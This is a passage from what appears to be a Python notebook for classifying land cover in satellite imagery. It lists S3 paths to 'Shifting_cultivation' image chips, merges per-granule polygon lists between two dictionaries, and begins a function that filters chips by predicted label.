's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_2700.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_3900.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_1700.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_2000.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2100.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2100.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_3700.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_600_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_600_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_600_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_600_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_600_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_2300.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_3500.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_3500.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_3500.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6800_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6800_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6800_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6800_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6800_3600.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7000_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7000_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7000_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_700_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_700_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_700_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_700_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_700_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_700_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7100_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7100_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7100_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7200_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7200_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7200_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7200_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7300_3700.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7500_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7500_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7600_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7600_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7700_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_800_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_800_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_900_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_900_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_900_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_900_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_0_100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_0_200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_100_0.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_100_100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_100_200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_200_100.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_200_200.tif'])

len(data["87"])
len(data2["87"])
```

52 1034 52 377 92 4543 92 451 87 41 87 7

```
# Merge every granule's polygon list from data2 into data, key by key.
for key in data2.keys():
    for polygon in data2[key]:
        data[key].append(polygon)
data.keys()

# Sanity check after the merge: print, per granule, the combined length in
# `data` next to the contribution that came from `data2`.
for key in data2.keys():
    print(key,len(data[key]))
    print(key,len(data2[key]))
    # for polygon in data2[key]:
    #     data[key].append(polygon)
data.keys()

def output_for_gdf(data,label_match="ISL"):
    """Collect every chip whose predicted labels include ``label_match``.

    data: dict mapping granule id -> list of chip-result dicts; each chip
    dict has at least a 'predicted_labels' list (per the usage below it is
    also expected to carry 'actual_label' and 'polygon_coords' — TODO
    confirm against the producer of this structure).
    label_match: label to filter on (default "ISL").
    Returns a list of [granule_id, chip_dict] pairs, one per matching label.

